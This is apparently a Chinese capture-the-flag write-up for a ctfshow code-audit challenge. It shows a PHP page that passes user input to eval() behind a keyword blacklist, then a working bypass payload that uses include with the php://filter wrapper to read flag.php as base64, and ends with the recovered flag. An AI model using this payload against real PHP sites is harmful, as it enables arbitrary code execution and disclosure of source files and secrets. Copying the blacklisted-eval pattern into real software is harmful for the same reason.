代码审计
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
//过滤flag,system,php,cat,sort,shell,点号,空格,单引号,反撇号,echo,(
}else{
highlight_file(__FILE__);
}
用上一题的方法,嵌套包含flag.php文件逃逸出来
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
#php://filter参考文件包含漏洞中的php伪协议
#得到的文字base64再解码
ctfshow{2bf658c1-4a45-4dea-8ecd-6379c4f22abf}